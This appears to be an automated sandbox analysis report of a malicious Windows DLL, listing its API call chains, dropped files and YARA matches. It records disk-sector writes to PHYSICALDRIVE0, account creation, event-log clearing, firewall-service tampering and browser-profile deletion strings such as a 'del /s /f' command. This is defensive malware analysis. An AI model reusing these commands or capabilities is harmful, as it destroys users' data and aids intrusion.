                  Source: ZfJheGhddq.dllStatic file information: File size 1269760 > 1048576
                  Source: Binary string: F:\hidden-master\x64\Debug\QAssist.pdb source: loaddll32.exe, 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, rundll32.exe, 00000003.00000002.4028225256.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4028177063.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, ZfJheGhddq.dll
                  Source: Binary string: rundll32.pdb source: rundll32.exe, 00000003.00000002.4027805864.00000000027FA000.00000004.00000020.00020000.00000000.sdmp, svchos1.exe.3.dr
                  Source: Binary string: rundll32.pdbGCTL source: rundll32.exe, 00000003.00000002.4027805864.00000000027FA000.00000004.00000020.00020000.00000000.sdmp, svchos1.exe.3.dr
                  Source: Binary string: F:\hidden-master\Debug\QAssist.pdb source: loaddll32.exe, 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, rundll32.exe, 00000003.00000002.4028225256.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4028177063.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, ZfJheGhddq.dll
                  Source: svchos1.exe.3.drStatic PE information: 0x6A8F1B39 [Wed Aug 26 16:58:33 2026 UTC]
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10014700 LoadLibraryA,GetProcAddress,#823,#823,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,strchr,strncat,strncat,strncat,strchr,RegQueryValueExA,wsprintfA,RegQueryValueExA,strchr,RegEnumKeyExA,wsprintfA,wsprintfA,RegEnumValueA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrcatA,#825,#825,0_2_10014700
                  Source: ZfJheGhddq.dllStatic PE information: section name: .rodata
                  Source: ZfJheGhddq.dllStatic PE information: section name: .rotext
                  Source: svchos1.exe.3.drStatic PE information: section name: .didat
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_1002D080 push eax; ret 0_2_1002D0AE
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1002D080 push eax; ret 3_2_1002D0AE

                  Persistence and Installation Behavior

                  barindex
                  Source: C:\Windows\System32\loaddll32.exeCode function: CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle,Sleep,GetVersion,ExitWindowsEx,ExitProcess, \\.\PHYSICALDRIVE00_2_1000E670
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle,Sleep,GetVersion,ExitWindowsEx,ExitProcess, \\.\PHYSICALDRIVE03_2_1000E670
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10025AA0 lstrlenA,lstrlenA,lstrlenA,lstrlenA,NetUserAdd,#825,#825,wcscpy,#825,#825,NetLocalGroupAddMembers,#825,LocalFree,0_2_10025AA0
                  Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\Public\Documents\MM\svchos1.exeJump to dropped file

                  Boot Survival

                  barindex
                  Source: C:\Windows\System32\loaddll32.exeCode function: CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle,Sleep,GetVersion,ExitWindowsEx,ExitProcess, \\.\PHYSICALDRIVE00_2_1000E670
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle,Sleep,GetVersion,ExitWindowsEx,ExitProcess, \\.\PHYSICALDRIVE03_2_1000E670
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_1001EFD0 Shellex,#823,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,GetCurrentThreadId,PostThreadMessageA,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetCommandLineA,CreateMutexA,GetLastError,strstr,Sleep,Sleep,OpenSCManagerA,OpenServiceA,CloseServiceHandle,StartServiceA,CloseServiceHandle,CloseServiceHandle,ExitProcess,CloseServiceHandle,CloseServiceHandle,Sleep,Sleep,sprintf,ExitProcess,sprintf,sprintf,GetModuleFileNameA,sprintf,Sleep,sprintf,ExitProcess,Sleep,Sleep,Sleep,Sleep,0_2_1001EFD0
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_1001D150 IsWindowVisible,IsIconic,GetWindowTextA,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,0_2_1001D150
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1001D150 IsWindowVisible,IsIconic,GetWindowTextA,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,3_2_1001D150
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_1000E540 OpenEventLogA,ClearEventLogA,OpenEventLogA,ClearEventLogA,CloseEventLog,0_2_1000E540
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10001140 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,#825,#825,#825,#825,0_2_10001140
                  Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_1001D4A00_2_1001D4A0
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_1001DA700_2_1001DA70
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1001D4A03_2_1001D4A0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1001DA703_2_1001DA70
                  Source: C:\Windows\System32\loaddll32.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_0-21779
                  Source: C:\Windows\SysWOW64\rundll32.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleep
                  Source: C:\Windows\System32\loaddll32.exeCode function: LocalAlloc,LocalAlloc,OpenSCManagerA,EnumServicesStatusA,EnumServicesStatusA,LocalAlloc,EnumServicesStatusA,lstrlenA,OpenServiceA,QueryServiceConfigA,LocalAlloc,QueryServiceConfigA,QueryServiceConfig2A,LocalAlloc,QueryServiceConfig2A,lstrcatA,lstrcatA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,LocalSize,LocalReAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,LocalFree,LocalFree,LocalFree,CloseServiceHandle,LocalFree,CloseServiceHandle,LocalReAlloc,0_2_10019930
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: LocalAlloc,LocalAlloc,OpenSCManagerA,EnumServicesStatusA,EnumServicesStatusA,LocalAlloc,EnumServicesStatusA,lstrlenA,OpenServiceA,QueryServiceConfigA,LocalAlloc,QueryServiceConfigA,QueryServiceConfig2A,LocalAlloc,QueryServiceConfig2A,lstrcatA,lstrcatA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,LocalSize,LocalReAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,LocalFree,LocalFree,LocalFree,CloseServiceHandle,LocalFree,CloseServiceHandle,LocalReAlloc,3_2_10019930
                  Source: C:\Windows\System32\loaddll32.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_0-21918
                  Source: C:\Windows\System32\loaddll32.exeAPI coverage: 2.3 %
                  Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 2.5 %
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_1001DA700_2_1001DA70
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1001DA703_2_1001DA70
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10009080 lstrlenA,wsprintfA,FindFirstFileA,LocalAlloc,LocalReAlloc,lstrlenA,FindNextFileA,LocalFree,FindClose,0_2_10009080
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_100092A0 lstrlenA,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_100092A0
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_100097D0 lstrlenA,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z,#823,#825,wsprintfA,FindNextFileA,FindClose,0_2_100097D0
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_1002AB10 lstrcatA,lstrcatA,lstrcatA,FindFirstFileA,GetPrivateProfileStringA,lstrlenA,strstr,GetPrivateProfileStringA,lstrlenA,lstrlenA,LocalSize,LocalReAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,FindNextFileA,FindClose,0_2_1002AB10
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10009B60 FindFirstFileA,FindClose,FindClose,0_2_10009B60
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10009C40 FindFirstFileA,FindClose,CloseHandle,CreateFileA,0_2_10009C40
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_1000BD50 ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z,?_Eos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI@Z,?_Xran@std@@YAXXZ,?_Freeze@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXXZ,?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ID@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,FindFirstFileA,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,_strcmpi,DeleteFileA,_strcmpi,_strcmpi,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,#825,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,DeleteFileA,#825,FindNextFileA,FindClose,RemoveDirectoryA,#825,0_2_1000BD50
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10009080 lstrlenA,wsprintfA,FindFirstFileA,LocalAlloc,LocalReAlloc,lstrlenA,FindNextFileA,LocalFree,FindClose,3_2_10009080
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100092A0 lstrlenA,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,3_2_100092A0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100097D0 lstrlenA,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z,#823,#825,wsprintfA,FindNextFileA,FindClose,3_2_100097D0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1002AB10 lstrcatA,lstrcatA,lstrcatA,FindFirstFileA,GetPrivateProfileStringA,lstrlenA,strstr,GetPrivateProfileStringA,lstrlenA,lstrlenA,LocalSize,LocalReAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,FindNextFileA,FindClose,3_2_1002AB10
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10009B60 FindFirstFileA,FindClose,FindClose,3_2_10009B60
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10009C40 FindFirstFileA,FindClose,CloseHandle,CreateFileA,3_2_10009C40
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1000BD50 ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z,?_Eos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI@Z,?_Xran@std@@YAXXZ,?_Freeze@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXXZ,?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ID@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,FindFirstFileA,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,_strcmpi,DeleteFileA,_strcmpi,_strcmpi,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,#825,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,DeleteFileA,#825,FindNextFileA,FindClose,RemoveDirectoryA,#825,3_2_1000BD50
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10008E50 GetLogicalDriveStringsA,GetUserNameA,_strcmpi,SHGetFolderPathA,CloseHandle,lstrlenA,lstrlenA,lstrlenA,GetVolumeInformationA,SHGetFileInfoA,lstrlenA,lstrlenA,GetDiskFreeSpaceExA,GetDriveTypeA,lstrlenA,0_2_10008E50
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_1001B250 GetTickCount,GetVersionExA,getsockname,GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,GetDriveTypeA,GetDiskFreeSpaceExA,GetTickCount,GetTickCount,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,GetLastInputInfo,GetTickCount,_access,lstrcpyA,0_2_1001B250
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_100174C0 BlockInput,BlockInput,BlockInput,0_2_100174C0
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10014700 LoadLibraryA,GetProcAddress,#823,#823,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,strchr,strncat,strncat,strncat,strchr,RegQueryValueExA,wsprintfA,RegQueryValueExA,strchr,RegEnumKeyExA,wsprintfA,wsprintfA,RegEnumValueA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrcatA,#825,#825,0_2_10014700
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_1000A580 LocalAlloc,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcessHeap,GetProcessHeap,CreateToolhelp32Snapshot,lstrlenA,htons,inet_ntoa,wsprintfA,wsprintfA,htons,inet_ntoa,wsprintfA,lstrcpyA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,LocalSize,LocalReAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,GetProcessHeap,GetProcAddress,GetProcAddress,GetProcessHeap,GetProcessHeap,HeapFree,FreeLibrary,htons,inet_ntoa,wsprintfA,lstrcpyA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,LocalSize,LocalReAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,GetProcessHeap,GetProcessHeap,GetProcessHeap,CreateToolhelp32Snapshot,lstrlenA,htons,inet_ntoa,wsprintfA,wsprintfA,htons,inet_ntoa,wsprintfA,lstrcpyA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,LocalSize,LocalReAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,htons,inet_ntoa,wsprintfA,lstrcpyA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,LocalSize,LocalReAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,CloseHandle,LocalFree,LocalFree,LocalFree,FreeLibrary,LocalReAlloc,0_2_1000A580

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_1000E780 SetEvent,FindWindowA,ShowWindow,FindWindowA,ShowWindow,FindWindowA,FindWindowA,ShowWindow,ShowWindow,FindWindowA,ShowWindow,FindWindowA,FindWindowA,ShowWindow,ShowWindow,FindWindowA,ShowWindow,FindWindowA,SendMessageA,FindWindowA,SendMessageA,mciSendStringA,mciSendStringA,Beep,Sleep,Beep,Sleep,GetForegroundWindow,Beep,Sleep,MoveWindow,GetWindowRect,MoveWindow,Sleep,MoveWindow,Sleep,Beep,SwapMouseButton,SwapMouseButton,0_2_1000E780
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_1000E780 SetEvent,FindWindowA,ShowWindow,FindWindowA,ShowWindow,FindWindowA,FindWindowA,ShowWindow,ShowWindow,FindWindowA,ShowWindow,FindWindowA,FindWindowA,ShowWindow,ShowWindow,FindWindowA,ShowWindow,FindWindowA,SendMessageA,FindWindowA,SendMessageA,mciSendStringA,mciSendStringA,Beep,Sleep,Beep,Sleep,GetForegroundWindow,Beep,Sleep,MoveWindow,GetWindowRect,MoveWindow,Sleep,MoveWindow,Sleep,Beep,SwapMouseButton,SwapMouseButton,0_2_1000E780
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1000E780 SetEvent,FindWindowA,ShowWindow,FindWindowA,ShowWindow,FindWindowA,FindWindowA,ShowWindow,ShowWindow,FindWindowA,ShowWindow,FindWindowA,FindWindowA,ShowWindow,ShowWindow,FindWindowA,ShowWindow,FindWindowA,SendMessageA,FindWindowA,SendMessageA,mciSendStringA,mciSendStringA,Beep,Sleep,Beep,Sleep,GetForegroundWindow,Beep,Sleep,MoveWindow,GetWindowRect,MoveWindow,Sleep,MoveWindow,Sleep,Beep,SwapMouseButton,SwapMouseButton,3_2_1000E780
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1000E780 SetEvent,FindWindowA,ShowWindow,FindWindowA,ShowWindow,FindWindowA,FindWindowA,ShowWindow,ShowWindow,FindWindowA,ShowWindow,FindWindowA,FindWindowA,ShowWindow,ShowWindow,FindWindowA,ShowWindow,FindWindowA,SendMessageA,FindWindowA,SendMessageA,mciSendStringA,mciSendStringA,Beep,Sleep,Beep,Sleep,GetForegroundWindow,Beep,Sleep,MoveWindow,GetWindowRect,MoveWindow,Sleep,MoveWindow,Sleep,Beep,SwapMouseButton,SwapMouseButton,3_2_1000E780
                  Source: C:\Windows\System32\loaddll32.exeCode function: CreateToolhelp32Snapshot,Process32First,_strcmpi,OpenProcess,TerminateProcess,_strcmpi,OpenProcess,TerminateProcess,Process32Next,CloseHandle, explorer.exe0_2_1000ED10
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: CreateToolhelp32Snapshot,Process32First,_strcmpi,OpenProcess,TerminateProcess,_strcmpi,OpenProcess,TerminateProcess,Process32Next,CloseHandle, explorer.exe3_2_1000ED10
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10021410 _access,GetModuleFileNameA,ShellExecuteExA,ShellExecuteExA,GetLastError,exit,_access,_access,Sleep,WinExec,WinExec,_access,WinExec,Sleep,_access,Sleep,CreateThread,CreateThread,CloseHandle,CloseHandle,CreateThread,CloseHandle,Shellex,0_2_10021410
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\ZfJheGhddq.dll",#1Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_1001EFD0 Shellex,#823,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,GetCurrentThreadId,PostThreadMessageA,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetCommandLineA,CreateMutexA,GetLastError,strstr,Sleep,Sleep,OpenSCManagerA,OpenServiceA,CloseServiceHandle,StartServiceA,CloseServiceHandle,CloseServiceHandle,ExitProcess,CloseServiceHandle,CloseServiceHandle,Sleep,Sleep,sprintf,ExitProcess,sprintf,sprintf,GetModuleFileNameA,sprintf,Sleep,sprintf,ExitProcess,Sleep,Sleep,Sleep,Sleep,0_2_1001EFD0
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_100209D0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_100209D0
                  Source: loaddll32.exe, loaddll32.exe, 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, rundll32.exe, rundll32.exe, 00000003.00000002.4028225256.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4028177063.00000000100FA000.00000008.00000001.01000000.00000003.sdmpBinary or memory string: Shell_TrayWnd
                  Source: ZfJheGhddq.dllBinary or memory string: Shell_TrayWndProgmanDwmapi.dllDwmIsCompositionEnabledDwmEnableCompositiondwmapi.dllrunasexplorer.exeSeDebugPrivilegecmd.exe /c RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 255\AppData\Local\Google\Chrome\User Data\DefaultC:\Users\\AppData\Roaming\Microsoft\Skype for DesktopSkype.exedel /s /f %appdata%\Mozilla\Firefox\Profiles\*.dbfirefox.exe\AppData\Roaming\360se6\User Data\Default360se6.exe\AppData\Local\Tencent\QQBrowser\User Data\DefaultQQBrowser.exe\AppData\Roaming\SogouExplorerSogouExplorer.exeBITS -inst.sys\system32\drivers\\sysnative\drivers\SYSTEM\CurrentControlSet\Services\BITSSYSTEM\SetupSYSTEM\SelectMarkTimeSYSTEM\CurrentControlSet\Services\\Registry\Machine\System\CurrentControlSet\Services\%SZwUnloadDriverNTDLL.DLLRtlInitUnicodeStringSeLoadDriverPrivilege
                  Source: loaddll32.exe, loaddll32.exe, 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, rundll32.exe, rundll32.exe, 00000003.00000002.4028225256.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4028177063.00000000100FA000.00000008.00000001.01000000.00000003.sdmpBinary or memory string: Progman
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_100A8230 cpuid 0_2_100A8230
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10002340 GetWindowLongA,PostQuitMessage,SetWindowLongA,GetModuleHandleA,LoadIconA,SetClassLongA,DestroyWindow,GetDlgItemTextA,GetDlgItem,SetFocus,GetLocalTime,sprintf,GetDlgItem,GetDlgItem,GetWindowTextLengthA,GetWindowTextLengthA,SetWindowTextA,GetWindowTextLengthA,SendMessageA,SendMessageA,SendMessageA,SetDlgItemTextA,GetDlgItem,SetFocus,0_2_10002340
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_1002A260 RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetSystemInfo,wsprintfA,wsprintfA,wsprintfA,RegOpenKeyExA,RegQueryValueExA,wsprintfA,RegCloseKey,wsprintfA,GetComputerNameA,GetTickCount,wsprintfA,GetDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,wsprintfA,ReleaseDC,wsprintfA,wsprintfA,wsprintfA,GetCommandLineA,wsprintfA,GetUserNameA,wsprintfA,wsprintfA,FindWindowA,GetWindow,GetWindowTextA,GetWindow,GetClassNameA,GlobalMemoryStatusEx,0_2_1002A260
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_1001E020 GetVersionExA,GetModuleFileNameA,sprintf,WaitForSingleObject,CloseHandle,FindWindowA,FindWindowA,Sleep,FindWindowA,Sleep,FindWindowA,CloseHandle,ExitProcess,0_2_1001E020

                  Lowering of HIPS / PFW / Operating System Security Settings

                  barindex
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10026980 OpenServiceA 00000000,sharedaccess,000F01FF0_2_10026980

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: ZfJheGhddq.dll, type: SAMPLE
                  Source: Yara matchFile source: 0.2.loaddll32.exe.10000000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: ZfJheGhddq.dll, type: SAMPLE
                  Source: Yara matchFile source: 0.2.loaddll32.exe.10000000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.4028211008.000000001011E000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.4028259362.000000001011E000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 1568, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4268, type: MEMORYSTR
